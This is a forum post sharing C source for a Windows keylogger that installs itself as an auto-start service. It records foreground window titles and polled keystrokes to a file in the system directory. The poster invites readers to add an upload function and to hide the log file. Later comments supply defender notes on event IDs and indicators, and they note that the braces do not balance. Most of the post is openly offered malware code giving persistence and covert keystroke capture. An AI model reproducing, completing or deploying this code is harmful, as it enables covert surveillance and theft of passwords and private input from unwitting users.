http://www.rohitab.com/discuss/topic/31185-c-windows-service-keylogger/
Here is a simple keylogger I put together. I decided to post it because I thought it was a pretty good example of creating a Windows service. At one point the actual service was a DLL injector that injected explorer with a DLL that then did the logging on DLL_PROCESS_ATTACH. However, I scrapped that because I was having issues with the restrictions associated with DllMain. I didn't put an upload function or anything, but if you want to actually use it you can just do that yourself.
Oh yeah and any dumb/skiddy shit you may do with this is not my fault.
Eh, enjoy.
/* This is my new keylogger, runs as a Service */
#include <windows.h>
using namespace std;
// Forward declarations: the service installer, the dispatcher setup, the
// ServiceMain callback, the control handler and the logging loop.
BOOL Install_Logger_Service();
void Initialize_Service();
void WINAPI Create_Service(DWORD , CHAR**);
void WINAPI Handle_Controls(DWORD control_code);
BOOL Logger();
// Used as both the service key name and the display name in CreateService.
// For triage: this is the string shown in the Services console and the name of
// the subkey under HKLM\SYSTEM\CurrentControlSet\Services after installation.
// NOTE(review): a char array initialised through TEXT() only builds when
// UNICODE is not defined; the listing assumes an ANSI build.
char service_name[100] = TEXT("Local Sex Daemon");
// Status block reported to the Service Control Manager (SCM) via SetServiceStatus.
SERVICE_STATUS serv_status;
// Handle returned by RegisterServiceCtrlHandler; stays 0 until Create_Service runs.
SERVICE_STATUS_HANDLE serv_handle = 0;
// Event created in Create_Service; nothing in this listing waits on or signals it.
HANDLE stop_service = 0;
// Declared but never used in this listing (no hook is installed anywhere below).
HHOOK hook_handle;
// Entry point for both a manual launch and a start initiated by the SCM.
// It first makes sure the service is registered, then hands the main thread to
// the service control dispatcher. When Install_Logger_Service() creates a new
// service it calls exit(0) itself, so Initialize_Service() is reached only when
// the installer returns (service already present, or creation did not succeed).
int main() {
Install_Logger_Service();
Initialize_Service();
return 0;
}
// Registers the running executable as an auto-start Windows service unless a
// service with the same name can already be opened.
// Returns TRUE on every path that returns; when a new service is created and
// its handle is valid, the process calls exit(0) instead of returning.
//
// Defender notes:
//  - Creating a service needs SC_MANAGER_CREATE_SERVICE access, which by default
//    is held by administrators, so this step implies an already elevated process.
//  - A successful install is recorded by the SCM as System-log event 7045 and,
//    when the corresponding audit policy is enabled, as Security event 4697.
//  - The resulting entry lives under HKLM\SYSTEM\CurrentControlSet\Services\<name>
//    with ImagePath set to the path of this executable.
BOOL Install_Logger_Service() {
// First pass: connect-only SCM handle, used just to probe for an existing service.
SC_HANDLE check_serv_handle = OpenSCManager(0, 0, SC_MANAGER_CONNECT);
if (check_serv_handle) {
SC_HANDLE chk_serv = OpenService(check_serv_handle, service_name, SERVICE_QUERY_STATUS);
// Service already registered: release both handles and change nothing.
if (chk_serv != NULL) {
CloseServiceHandle(chk_serv);
CloseServiceHandle(check_serv_handle);
return TRUE;
}
CloseServiceHandle(check_serv_handle);
}
// Second pass: SCM handle carrying the right to create services.
SC_HANDLE serv_c_handle = OpenSCManager(0, 0, SC_MANAGER_CREATE_SERVICE);
if (serv_c_handle) {
char prog_path[MAX_PATH + 1];
// GetModuleFileName(0, ...) yields the path of the current executable and returns
// the number of characters copied; the path is accepted only when that count
// equals the length of the string found in the buffer.
if (GetModuleFileName(0, prog_path, sizeof(prog_path)/sizeof(prog_path[0])) == strlen(prog_path)) {
SC_HANDLE create_serv = CreateService (serv_c_handle,
service_name, //Service Name
service_name, //Display Name
// Full access on the returned service handle.
SERVICE_ALL_ACCESS,
// Own-process service flagged as interactive. Since Windows Vista services run
// in session 0, isolated from users' interactive sessions, so the interactive
// flag no longer gives a service access to a logged-on user's desktop.
SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS,
// Started by the SCM at every boot: this is the persistence mechanism.
SERVICE_AUTO_START,
// Start-up failures are ignored by the boot process.
SERVICE_ERROR_IGNORE,
// Binary path: the executable that is currently running.
prog_path,
// No load-order group, tag, dependencies, account or password. A null account
// name makes the service run as LocalSystem.
0, 0, 0, 0, 0);
if (create_serv != NULL) {
StartService(create_serv, 0, 0); //This will get it started the first time
CloseServiceHandle(create_serv);
// The installing process ends here; the SCM-started instance carries on.
exit(0);
}
}
CloseServiceHandle(serv_c_handle);
}
return TRUE;
}
// ServiceMain callback named in the dispatch table built by Initialize_Service;
// the SCM invokes it when the service is started. Both parameters (argument
// count and argument vector) are unnamed and unused.
void WINAPI Create_Service(DWORD , CHAR**) {
// Baseline status: stopped, no error codes, no checkpoint or wait hint.
serv_status.dwServiceType = SERVICE_WIN32;
serv_status.dwCurrentState = SERVICE_STOPPED;
// No controls are accepted, so the service does not advertise stop or shutdown
// handling. Defender note: a stop request through the SCM is expected to be
// refused; containment then means terminating the process and disabling or
// deleting the service entry.
serv_status.dwControlsAccepted = 0;
serv_status.dwWin32ExitCode = NO_ERROR;
serv_status.dwServiceSpecificExitCode = NO_ERROR;
serv_status.dwCheckPoint = 0;
serv_status.dwWaitHint = 0;
serv_handle = RegisterServiceCtrlHandler(service_name, Handle_Controls);
if (serv_handle) {
// Report START_PENDING, then RUNNING, to the SCM.
serv_status.dwCurrentState = SERVICE_START_PENDING;
SetServiceStatus(serv_handle, &serv_status);
// Auto-reset, initially non-signalled, unnamed event; not used again in this listing.
stop_service = CreateEvent(0, FALSE, FALSE, 0);
serv_status.dwCurrentState = SERVICE_RUNNING;
SetServiceStatus(serv_handle, &serv_status);
//This is where the logging gets started at
// Logger() loops without a break, so SERVICE_STOPPED is never reported from here.
Logger();
}
return;
}
// Control handler registered with RegisterServiceCtrlHandler.
// The switch has only a default branch, so every control code is ignored; the
// handler just re-reports the current contents of serv_status to the SCM.
void WINAPI Handle_Controls(DWORD control_code) {
switch (control_code) {
default: {
break;
}
}
SetServiceStatus(serv_handle, &serv_status);
return;
}
// Connects the main thread to the SCM with a one-entry dispatch table that maps
// service_name to Create_Service.
// StartServiceCtrlDispatcher returns 0 on failure, which is what happens when
// the process was not started by the SCM; both branches simply return, so the
// result is effectively ignored.
void Initialize_Service() {
SERVICE_TABLE_ENTRY ServTable[] = {
{service_name, Create_Service},
// Null entry terminates the table.
{0, 0},
};
if (StartServiceCtrlDispatcher(ServTable) == 0) {
return;
}
return;
}
// Logging loop run on the thread that executes Create_Service. It appends
// foreground-window titles and polled key states to a text file in the system
// directory. Declared to return BOOL, but the while (1) loop has no break, so
// the CloseHandle and return at the bottom are not reached.
// NOTE(review): as posted, the braces in this function do not balance, so the
// listing does not compile unchanged; the comments describe the evident intent.
//
// Defender notes: the indicators visible here are the file MahLogSon.txt in the
// directory returned by GetSystemDirectory, a service process holding that file
// open for append, and a service process calling GetForegroundWindow and
// GetAsyncKeyState roughly ten times per second. Because services run in
// session 0 on Windows Vista and later, these calls are not expected to observe
// a logged-on user's desktop there.
BOOL Logger() {
char window_text[500];
char old_window_text[500];
char latest_key[50];
char file_name[MAX_PATH + 1];
char write_name[500];
int i;
int virt_key;
HANDLE file_handle;
HWND fore_hndl;
DWORD numb_bytes;
// Build <system directory>\MahLogSon.txt; writing there requires elevated rights.
GetSystemDirectory(file_name, MAX_PATH + 1);
strcat(file_name, "\\MahLogSon.txt");
// Open or create the log for appending; other processes may read it meanwhile.
// The returned handle is not checked against INVALID_HANDLE_VALUE.
file_handle = CreateFile (file_name, FILE_APPEND_DATA, FILE_SHARE_READ, NULL, OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL, 0); // Could make it hidden or
//something if you wanted
//FILE_ATTRIBUTE_HIDDEN
while (1) {
// Record the foreground window's title whenever it differs from the last one logged.
fore_hndl = GetForegroundWindow();
if (fore_hndl != NULL) {
if (GetWindowText(fore_hndl, (char*)&window_text, 499) != 0) {
if (strcmp(window_text, old_window_text) != 0) {
strcpy(write_name, "\r\n{WINDOW TITLE}-> ");
strcat(write_name, window_text);
strcat(write_name, "\r\n");
WriteFile(file_handle, write_name, strlen(write_name), &numb_bytes, NULL);
strcpy(old_window_text, window_text);
}
}
}
// Poll every virtual-key code from 8 (VK_BACK) through 255.
for (i = 8; i <= 255; i++) {
// Low-order bit set: the key was pressed since the previous GetAsyncKeyState call.
if ((GetAsyncKeyState(i) & 1) == 1) {
// Map type 0 translates the virtual-key code into a scan code.
virt_key = MapVirtualKey(i, 0);
// Selected keys get a fixed marker; everything else goes through GetKeyNameText.
switch (i) {
case VK_RETURN: {
strcpy(latest_key, "\n");
break;
}
case VK_SPACE: {
strcpy(latest_key, " ");
break;
}
case VK_TAB: {
strcpy(latest_key, " ");
break;
}
case VK_DELETE: {
strcpy(latest_key, "[D]");
break;
}
case VK_BACK: {
strcpy(latest_key, "[B]");
break;
}
case VK_ESCAPE: {
strcpy(latest_key, "[EX]");
break;
}
// 0xA2 (VK_LCONTROL) and 0xA3 (VK_RCONTROL) fall through to 0x11 (VK_CONTROL).
case 0x0A2: {
}
case 0x00A3: { //This takes care of control keys
}
case 0x011: {
strcpy(latest_key, "[CTL]");
break;
}
// VK_SHIFT and VK_LSHIFT fall through to VK_RSHIFT.
case VK_SHIFT: {
}
case VK_LSHIFT: { // Shift Keys
}
case VK_RSHIFT: {
strcpy(latest_key, "[SFT]");
break;
default: {
// GetKeyNameText expects the scan code in bits 16-23 of its first argument.
GetKeyNameText(virt_key << 16, latest_key, 50);
break;
}
}
// Append the marker or key name to the log, then clear the buffer.
WriteFile(file_handle, latest_key, strlen(latest_key), &numb_bytes, NULL);
strcpy(latest_key, "");
}
}
// 100 ms pause between polling passes.
Sleep(100);
}
CloseHandle(file_handle);
return TRUE;
}